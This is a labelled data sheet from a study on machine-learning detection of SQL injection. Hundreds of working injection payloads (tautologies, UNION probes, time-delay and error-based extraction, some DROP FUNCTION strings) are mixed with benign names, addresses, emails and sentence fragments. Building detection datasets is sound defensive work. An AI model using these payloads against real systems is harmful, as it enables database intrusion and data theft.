# Supplementary material for: Enhanced SQL injection detection using chi-square feature selection and machine learning classifiers
Source: Front Big Data. 2025 Nov 19;8:1686479. doi: 10.3389/fdata.2025.1686479 (PMC12672241; doi:10.3389/fdata.2025.1686479)
Supplement: Supplementary file 1 [file Data_Sheet_1.csv]

Sentence	Label
duilio	0
They measured pets &apos; heart rates analysed behaviour	0
50374	0
"));DECLARE @x CHAR(9);SET @x=0x303a303a35;WAITFOR DELAY @x--	1
select * from users where id = 1 or ";#" or 1 = 1 -- 1	1
select ( case when ( 7254 = 5901 ) then 1 else 7254* ( select 7254 from master..sysdatabases ) end ) --	1
));DEclaRe/**/@ZfzO/**/NVaRCHaR(4000);Set/**/@ZfzO=(sEleCt/**/'qbjxq'+(sEleCt/**/(CaSe/**/whEn/**/(9160=9160)/**/thEN/**/'1'/**/ElSE/**/'0'/**/End))+'qzqqq');eXEC/**/@ZfzO--	1
a8o8decer	0
steklasa	0
The U	0
48426953q	0
-2289" ) or 8624 = 6279 and ( "ised" = "ised	1
) RLIKE (SELECT 3685 FROM (SELECT(SLEEP(5)))RSEy)-- raBK	1
-9143 ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric )	1
1;SELECT *	1
4646925880970082	0
He wrote &apos; Theology Computer &apos; questioned separates humans machine , creator creation	0
1' where 6721 = 6721 union all select null,null,null,null,null,null,null,null,null,null#	1
select * from users where id = '1' or !<@ union select 1,version ( ) -- 1'	1
') AND 9470=9470	1
1'+ ( select bptu where 7356 = 7356 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) ) +'	1
2561	0
kouichir	0
-4571' union all select 3227,3227,3227,3227--	1
kofoed@serviconlevante.mr	0
calle robregordo, 171 10-c	0
"="passs";WAITFOR DELAY '0:0:5'--	1
acho queralt	0
Password: -7221"))/**/oR/**/7981=9059--/**/miWq	1
')/**/WhERE/**/9154=9154/**/oR/**/nOT/**/4300=2838--/**/fPlY	1
However , source text makes barely reference intense delivery	0
")/**/As/**/AnAh/**/wheRe/**/3757=3757;sELEct/**/(CAsE/**/wHen/**/(7029=7029)/**/theN/**/7029/**/elSe/**/1/(sELEct/**/0)/**/ENd)--	1
1' ) ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( 'ican' like 'ican	1
travesia doctor sanchez, 139, 12?h	0
1" ) union all select null,null,null,null,null,null,null,null--	1
1' in boolean mode ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) #	1
57879425v	0
) WHERE 2156=2156 AND 3269=(SELECT 3269 FROM PG_SLEEP(5))-- Qkcf	1
Together team mate , Pangerl already twice crowned World Champion 12-hour race	0
5x8r0r	0
-6178 ) ) as lygb where 9559 = 9559 or ( 8459 = 8459 ) *4906--	1
select * from users where id = '1' or \.<$ union select 1,@@VERSION -- 1'	1
1' in boolean mode ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --	1
godiva	0
copons, 11	0
65456048a	0
jwahar	0
calle santander, 0,	0
')/**/Or/**/nOT/**/4928=4928/**/And/**/('Ujyk'='Ujyk	1
&quot; While weaker aircraft deliveries mostly anticipated , clearly disappointed margin performance transportation , &quot; Doerksen said client note	0
claros lafragueta	0
UNION ALL SELECT	1
As result , important collaboration developed gynaecologist , Hanne , performed countless operations several journeys location	0
47330	0
c/ rio ter 159,	0
4945470408027302	0
"/**/Or/**/6836=(SElecT/**/6836/**/FROm/**/pg_sLEEP(5))/**/aNd/**/"KHRd"="KHRd	1
83 mid afternoon trading Thursday	0
sibila	0
-4739' ) ) union all select 6585,6585,6585,6585,6585--	1
pobla tornesa, la	0
s	1
select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( 'atvu' = 'atvu	1
52	0
1' and non_existant_table = '1	1
')))/**/Or/**/(SELEct/**/5652/**/froM/**/(SELEct(sLeEp(5)))TIIA)/**/ANd/**/((('iVeK'/**/LIke/**/'iVeK	1
calle valsendero, 48,	0
pleitas	0
1' ) ) and make_set ( 1002 = 3556,3556 ) and ( ( 'mfao' = 'mfao	1
select ( case when ( 1961 = 2048 ) then 1961 else 1961* ( select 1961 from information_schema.character_sets ) end ) #	1
Only one second later , experienced Ballerstedt managed take second place overall standings	0
Email: (SELECT 5788 FROM (SELECT(SLEEP(5)))FFgf)	1
1 ) where 4600 = 4600 or sleep ( 5 ) --	1
c4l6716o	0
0n3r3oscura	0
1 ) where 8008 = 8008 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --	1
brewer	0
mirel-duvitski@pavimentosalagon.sr	0
)) AND 9690 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9690=9690) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(113))) AND ((6471=6471	1
&quot; We address subject municipal rates , investments made coming years could subsidies , &quot; commented Gerster regarding matter	0
";SELECT SLEEP(5) AND "mzfV" LIKE "mzfV	1
maisa	0
')/**/rLiKE/**/(SELeCT/**/4301/**/fRom/**/(SELeCT(SLeEP(5)))URhz)/**/AnD/**/('gAMO'/**/lIKE/**/'gAMO	1
-4610' ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( 'hdco' = 'hdco	1
nella	0
c/ manresa 56 2-e	0
igualeja	0
The traffic light system , cost around EUR 15,000 , &quot; modern system currently available market , &quot; explained Arnold	0
c/ espigo, 0 10h	0
64526656h	0
1' and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and 'rupq' = 'rupq	1
1' ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( 'opll' like 'opll	1
desportilladura	0
'))/**/rlikE/**/(seLeCt/**/4301/**/fROM/**/(seLeCt(SLeep(5)))URhz)/**/aND/**/(('KHcd'/**/lIKe/**/'KHcd	1
-3377" ) or 4982 = 6608#	1
`)/**/wHErE/**/2777=2777/**/aNd/**/8436=1599--/**/IRkr	1
1 ) ) ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( ( 1729 = 1729	1
The planned covering dilapidated house rear plot permitted safety reasons , premises risk collapsing	0
-2679' ) ) ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( 'cutk' like 'cutk	1
73361115q	0
')) AS waJi WHERE 5064=5064;(SELECT * FROM (SELECT(SLEEP(5)))TCOY)#	1
`=`emanuel@gmail.com` AND 8094=8156 AND `emanuel@gmail.com`=`emanuel@gmail.com	1
AND 3711=3711#	1
5 metres , time possible unload Capesize bulk carriers	0
`=`passs`;SELECT PG_SLEEP(5) AND `passs`=`passs	1
vargueo	0
blomfield@enlanzarote.com.al	0
stanczak-kasem@movil-google.tj	0
' AND 5163 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (5163=5163) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(113))) AND 'JAkM'='JAkM	1
65782684q	0
-1043" ) where 4207 = 4207 or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --	1
1 ) ) as eveb where 7567 = 7567	1
93310194e	0
milligan	0
calle alfaz del pi, 96 11?d	0
crous zuta	0
"/**/Or/**/sleEp(5)/**/aND/**/"ydQt"="ydQt	1
')/**/whERE/**/9677=9677/**/WAITFOR/**/DELAY/**/'0:0:5'--/**/jiqJ	1
1 ) ) and make_set ( 8554 = 3286,3286 ) and ( ( 7385 = 7385	1
junette6	0
1'|| ( select 'ywjy' where 7579 = 7579	1
hervert@clinicadentalsansalvador.ch	0
yamilem	0
1 ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( 2160 = 2160	1
"a"" or 1 = 1--"	1
For sufficient number educational places provided need skilled workers covered	0
3.10E+17	1
-5625" union all select 6087,6087,6087,6087,6087,6087--	1
A study aiming increase benefits Scotland HS2 rail project announced UK government	0
calle juan valera 97 12d	0
')/**/aS/**/bcbE/**/WhERe/**/7825=7825/**/oR/**/SLEEp(5)#	1
"));IF(8626=3781) SELECT 8626 ELSE DROP FUNCTION kxtW--	1
call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and 'rfgj' like 'rfgj	1
2865	0
call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( 'gtcb' = 'gtcb	1
3064942409734995	0
-1886' where 5518 = 5518 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --	1
8772381547327931	0
kirkpatr	0
1'+ ( select 'ovti' where 4243 = 4243 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) ) +'	1
&quot; He running sand full length arena even though looked tiny marvellous job	0
12232	0
00863764e	0
1 or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )	1
Email: (SELECT (CASE WHEN (6211=6211) THEN 6211 ELSE 6211*(SELECT 6211 UNION ALL SELECT 9454) END))	1
secuita, la	0
87252388w	0
6657	0
arnoul@suecas.com.il	0
-9212 or 1026 = 7967#	1
teosa	0
1" ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( "hybu" like "hybu	1
( select ( case when ( 5603 = 5603 ) then 5603 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual )	1
borbn bascomta	0
05781002k	0
fennell	0
1' ) or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --	1
in5rover88	0
escultrico	0
baldomera	0
rui-yuan	0
san ambrosio 65 6?h	0
pager@cocheacoche.ws	0
')/**/oR/**/nOT/**/4928=4928/**/And/**/('aPxp'/**/LiKE/**/'aPxp	1
1,iif ( 7475 = 7475,1,1/0 )	1
' ) or true--	1
santa clara de avedillo	0
05145	0
calle santa barbara, 17 7c	0
drozdek.waechter@tarifasdevuelos.bj	0
1" ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --	1
The youngster , village Nantyglo , near Ebbw Vale , South Wales , following footsteps aunt Sharon Howells , showing horses 10 years	0
However, scenarios prosodic cues available due inaccessible original raw speech waveforms	0
If Anna Benni communicate upcoming holiday travels via Gmail , Google display corresponding links holiday offers	0
') AND 5511=5511-- LqMB	1
1' ) as vpop where 2528 = 2528 union all select null,null,null,null,null,null,null#	1
In paper, propose jointly performing punctuation prediction transition-based dependency parsing transcribed speech text	0
select * from generate_series ( 1488,1488,case when ( 1488 = 1685 ) then 1 else 0 end ) limit 1--	1
suto8i+a	0
';If(2090=9200)/**/sElECt/**/2090/**/ElsE/**/drOp/**/fuNctiOn/**/fArF--	1
1' ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )	1
)/**/wHERE/**/3614=3614/**/oR/**/5067=(sELect/**/5067/**/fROM/**/pg_Sleep(5))--	1
)))/**/And/**/7048=(seleCt/**/7048/**/frOm/**/Pg_sLEep(5))--	1
Email: -6075	1
%';WAITFOR DELAY '0:0:5'--	1
";Declare/**/@ZfzO/**/NvARcHAR(4000);sEt/**/@ZfzO=(SelECT/**/'qbjxq'+(SelECT/**/(CaSe/**/wheN/**/(9160=9160)/**/theN/**/'1'/**/eLsE/**/'0'/**/eND))+'qzqqq');eXEC/**/@ZfzO--	1
1 ) as cnpv where 4902 = 4902 and elt ( 1210 = 1210,sleep ( 5 ) ) --	1
0a3ramplar	0
"="passs";SELECT PG_SLEEP(5)--	1
1" and 6637 = 2321	1
This finding , reflected across sizes major business groups , shows business pushing &quot; meaningful change &quot; brings powers back UK	0
)/**/And/**/SLEeP(5)--/**/FThm	1
4557	0
Eye witnesses reported seeing shooter gun one departure lounges , reported several media	0
17467	0
wilton7@weat.ic	0
1%" ) ) union all select null,null,null,null,null,null,null,null,null,null--	1
108	0
( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( 'kerg' like 'kerg	1
1' ) ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( ( 'yznn' like 'yznn	1
bedon merlach	0
1" ) rlike sleep ( 5 ) #	1
1' ) where 5279 = 5279 or sleep ( 5 ) #	1
6r_o733300e	0
1' ) ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( 'jryo' = 'jryo	1
-1055' union all select 7758,7758,7758,7758,7758,7758--	1
Email: -9185')/**/oR/**/9139=9072	1
1' where 9024 = 9024 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) --	1
1'+ ( select 'yzxc' where 5230 = 5230 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) ) +'	1
')/**/oRdeR/**/bY/**/3522#	1
1" ) ) or sleep ( 5 ) #	1
1'|| ( select 'bifa' where 6077 = 6077 and 4547 = 9301	1
' or uid like '%	1
select * from users where id = 1 or "{ ( " = 1 or 1 = 1 -- 1	1
t31331	0
1 ) where 9371 = 9371 union all select null,null,null,null,null,null,null--	1
1 and elt ( 1210 = 1210,sleep ( 5 ) ) -- ommf	1
')))/**/And/**/SLeeP(5)/**/And/**/((('ujkn'/**/LiKe/**/'ujkn	1
');dEClAre/**/@ZfzO/**/nvARChAR(4000);Set/**/@ZfzO=(SeLEcT/**/'qbjxq'+(SeLEcT/**/(Case/**/wheN/**/(9160=9160)/**/theN/**/'1'/**/ELSe/**/'0'/**/ENd))+'qzqqq');ExEC/**/@ZfzO--	1
However , always case existing apartment made age-appropriate therefore barrier-free , even beautiful ever	0
6796	0
As official Criminal Investigation Department reported , following first conviction achieved using telephone surveillance measures , least four cases exploitative human trafficking could identified	0
-1510' ) ) ) union all select 8755,8755,8755,8755,8755,8755,8755,8755,8755,8755--	1
clarette	0
admin" ) or "1" = "1"/*	1
jovn	0
justiniano	0
iciar	0
))) OR SLEEP(5) AND (((9100=9100	1
40	0
1'+ ( select 'rryx' where 1228 = 1228 union all select null,null,null,null,null,null,null,null,null#	1
motril, 131	0
natal	0
; begin declare @var varchar ( 8000 ) set @var = ' ...	1
1' ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( 'qbdm' = 'qbdm	1
1%' ) and 7533 = 7533 and ( '%' = '	1
03812	0
However , little distract 20 members citizen &apos;s initiative project	0
-4557%' ) ) or 4537 = 3401 and ( ( '%' = '	1
For 30 years , Josef Winkler writing heart , telling hardships childhood youth	0
1 ) ) or sleep ( __TIME__ ) #	1
kaefer	0
castarle chiroboga	0
1' ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( 'dreq' = 'dreq	1
bettiana	0
";(SELECT * FROM (SELECT(SLEEP(5)))HnJU)-- ACVb	1
1%" ) ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ( ( "%" = "	1
casavieja carriquiri	0
The movement also bolstered two former U	0
1' ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( 'lmoh' like 'lmoh	1
')) OR SLEEP(5)#	1
Distant worlds	0
23978164c	0
6243309452199598	0
0e06u8s17	0
&quot; We participate wild card process , &quot; said former national team player Pascal Roller , putting together concept professional club Hansa town since 2012	0
pogam@soycatalan.aq	0
To make sewerage channels wider would gobble millions	0
cutler.hutton@the-white-pearl-resort.int	0
This well old cathedral , barely noticed days	0
1%' ) ) and 1651 = 9324 and ( ( '%' = '	1
Email: -2455'/**/Or/**/5105/**/iN/**/(seLect/**/(cHAr(113)+cHAr(98)+cHAr(106)+cHAr(120)+cHAr(113)+(seLect/**/(caSe/**/WhEn/**/(5105=5105)/**/tHeN/**/cHAr(49)/**/eLsE/**/cHAr(48)/**/enD))+cHAr(113)+cHAr(122)+cHAr(113)+cHAr(113)+cHAr(113)))/**/aND/**/'Whho'='Whho	1
7291605361624408	0
92621448b	0
cado	0
)/**/wherE/**/3054=3054/**/aND/**/5319=(SeLECT/**/CounT(*)/**/fRoM/**/SYSMASTER:SYSPAGHDR)--	1
1%' ) ) ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ( '%' = '	1
)/**/As/**/BHiI/**/whEre/**/6466=6466;iF(4572=2297)/**/SeLEcT/**/4572/**/ELse/**/dRop/**/FUNcTion/**/wkiE--	1
eu6eo	0
4698577318753037	0
enjabonadura	0
select * from users where id = 1 or "$[" or 1 = 1 -- 1	1
The report also gives overview discrimination faced intersex transgender people realm employment , well levels harassment , violence bias crimes	0
Email: -8229')))/**/Or/**/2535=2535#	1
1' or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) )	1
')/**/aND/**/3300=8090#	1
-8754" ) ) ) union all select 7391,7391,7391,7391,7391,7391,7391--	1
1 ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( 4090 = 4090	1
+(SELect/**/0x556d7171/**/wHERe/**/2674=2674/**/oR/**/SLeEp(5)#	1
1'+ ( select zmbu where 8685 = 8685 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) ) +'	1
1%" ) )	1
exactor	0
-1139 ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #	1
It &apos;s like mystery people gay	0
1 ) or sleep ( 5 ) #	1
seaman@salaparis.ws	0
paleteo	0
Analysts expected earnings 10 cents per share revenue $ 4	0
vaquer gorigoitia	0
zabalza	0
vilanova de arousa	0
09198	0
Such matters clarified intergovernmental level , stated	0
")/**/AnD/**/7335=7335	1
' ) or sleep ( __TIME__ ) = '	1
arnal martagn	0
plaa carles ibaez 48, 6?g	0
The reconstruction could therefore result liability disputes	0
select sleep ( 5 ) and ( ( 'mmvf' like 'mmvf	1
-5903%" ) ) ) or 3038 = 3038	1
Analysts expected earnings 10 cents per share revenue $ 4	0
6019	0
1059050002779044	0
robillar	0
1' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and 'drui' like 'drui	1
"))/**/aNd/**/4130=1479--/**/Fdzs	1
By 5-4 vote , justices ruled Patient Protection Affordable Care Act &apos;s individual mandate - requires citizens buy health insurance 2014 else pay penalty - constitutional taxing power government	0
' or 1 = 1--	1
1'|| ( select 'awic' where 5227 = 5227	1
33500	0
9067788407413640	0
";sElecT/**/CAsE/**/WHEn/**/2205=3070/**/ThEN/**/1/**/ELSe/**/nUll/**/ENd--	1
04869	0
03769	0
deloria	0
'/**/anD/**/(SElect/**/1903/**/fRom/**/(SElect(sleEP(5)))khbj)/**/anD/**/'Alnp'='Alnp	1
sharnoff	0
4542202458392809	0
select * from users where id = 1 or " ( ," = 1 or 1 = 1 -- 1	1
' or sleep ( __TIME__ ) #	1
1' in boolean mode ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) #	1
'/**/haviNg/**/7883=5744/**/AnD/**/'AWVL'/**/liKE/**/'AWVL	1
select * from generate_series ( 4592,4592,case when ( 4592 = 4592 ) then 1 else 0 end ) limit 1--	1
")))/**/ordEr/**/bY/**/1#	1
-9358' or 9887 = 2569--	1
select ( case when ( 6434 = 3877 ) then 6434 else 1/ ( select 0 ) end ) --	1
Alongside local Eon power plant , imported coals also go power plants inland	0
select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( 'nslo' like 'nslo	1
')/**/aS/**/VyHP/**/wherE/**/8918=8918/**/Or/**/5067=(SElECT/**/5067/**/fROM/**/PG_SleeP(5))--	1
*ramonear	0
%';SELECT SLEEP(5) AND 'IYuX%'='IYuX	1
The second five test planes expected take flight coming weeks , remainder following shortly , company said	0
b9rl5ingar	0
' RLIKE (SELECT 3685 FROM (SELECT(SLEEP(5)))RSEy) OR 'cBCB'='WrHy	1
1" ) ) as nncz where 2331 = 2331	1
sikander	0
/**/RlIKe/**/(SElECT/**/(cASe/**/wHen/**/(7500=2640)/**/tHeN/**/0x7061737373/**/elSe/**/0x28/**/enD))	1
Let us never bow apologize more	0
The police inspector responsible time invited witness	0
baxley@italianmotorvillagesevilla.sh	0
));SEleCt/**/SLeep(5)/**/aND/**/((8340=8340	1
foulk@eonon.com.es	0
1" ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( "ghdr" like "ghdr	1
rogan-darrieux@rocofer.tc	0
%'/**/oRDer/**/By/**/8896--/**/NtqU	1
travesia carpio y torta, 133	0
')/**/WhErE/**/2093=2093/**/oR/**/8146=(seLecT/**/COunt(*)/**/FroM/**/SYSMASTER:SYSPAGHDR)--/**/FONk	1
swenson@pasajesaereosbaratos.do	0
);IF(7613=7613) SELECT 7613 ELSE DROP FUNCTION ohoi--	1
edmunds.emil@carimartin.io	0
tomkin	0
shiley	0
la rioja	0
cortegada	0
-5235 ) or make_set ( 9354 = 9354,7185 )	1
It said decided &quot; impose administrative penalty Chen Yongzhou revoking reporter &apos;s license	0
1" ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( "rfam" like "rfam	1
Here &apos;s point: sometime soon growing anti-EU anti-common currency feeling Europe coalesce kill euro	0
`/**/wHere/**/1061=1061/**/WAITFOR/**/DELAY/**/'0:0:5'--/**/bBOF	1
")) AS Qtmt WHERE 5831=5831;SELECT SLEEP(5)#	1
to_timestamp_tz	1
88194085x	0
7alcar19	0
iftekhar	0
c/ darrillo de la magdalena s/n	0
calle santa pola, 7	0
');WAITFOR DELAY '0:0:5' AND ('dubM'='dubM	1
-9856" union all select 9753--	1
-8615 ) ) ) or 4039 = 9144	1
0 or 1 = 1	1
select count ( * ) from generate_series ( 1,5000000 ) and ( ( ( 'wvzw' = 'wvzw	1
-8809'|| ( select 'hyzr' where 5694 = 5694 union all select 5694--	1
Matusov et al	0
poboleda	0
277 6	0
WHERE 6956=6956 WAITFOR DELAY '0:0:5'-- RmjK	1
elstica	0
bilal	0
Email: -5313)/**/WhERe/**/7142=7142/**/oR/**/4805=4805--/**/lIaf	1
97	0
Password: -3377) OR 5058 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (5058=5058) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(113)))-- woRf	1
1%' ) ) union all select null,null,null,null,null,null,null,null,null#	1
1'+ ( select 'tzey' where 4491 = 4491 union all select null,null,null,null,null,null,null,null--	1
sheara	0
1' ) where 9544 = 9544 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --	1
46891	0
waitfor delay '0:0:5' and ( ( ( "lpeo" = "lpeo	1
;DECLARE @x CHAR(9);SET @x=0x303a303a35;WAITFOR DELAY @x	1
")) AS RxRi WHERE 9004=9004;(SELECT * FROM (SELECT(SLEEP(5)))kuIe)-- BIuG	1
')/**/WHERe/**/4412=4412/**/And/**/6828=(SElecT/**/(CAse/**/wHeN/**/(6828=8396)/**/THeN/**/6828/**/ElsE/**/(SElecT/**/8396/**/uniON/**/SElecT/**/6907)/**/eND))--/**/wlqO	1
1%" and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and "%" = "	1
1' and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and 'fdbm' like 'fdbm	1
1 ) ) as gygm where 4024 = 4024	1
1' in boolean mode ) union all select null,null,null,null,null--	1
Chatting many people passing &quot; construction site &quot; , became clear many citizens believe execution project would make things much better town , although many questions citizen &apos;s initiative regarding scale planned project	0
8622247853302054	0
-7482" ) ) ) or 9077 = 2651	1
-8046" ) ) ) union all select 3126,3126,3126,3126,3126,3126,3126,3126,3126#	1
c/ montereria, 146 4d	0
calle san sebastian, 154 13d	0
pearroya-pueblonuevo	0
morfea	0
nemea	0
-5575" union all select 8665,8665,8665,8665,8665,8665,8665--	1
1467	0
1 ) as dlkh where 6179 = 6179 and 9198 = 9198--	1
mongo	0
ruiloba	0
der85nie88	0
centeno polanco	0
/**/WhERe/**/4715=4715/**/oR/**/Not/**/7939=2318--/**/QIKE	1
;BeGiN/**/DBMS_LOCK.sleEP(5);/**/EnD#/**/SzmD	1
59973244p	0
-2307' ) ) ) or 6872 = 6872 and ( ( ( 'fyok' like 'fyok	1
Arnold explained technology used new system: It fitted two radar sensors	0
He kept income women , worked years	0
")/**/As/**/Ksow/**/wherE/**/8474=8474/**/RLiKE/**/(SeLect/**/(CAsE/**/wHEn/**/(3210=3210)/**/tHEN/**/0x656d616e75656c40676d61696c2e636f6d/**/ElSe/**/0x28/**/EnD))--/**/VlIa	1
fitzgera	0
37246	0
-2790' ) ) or 8571 = 8571--	1
vajih	0
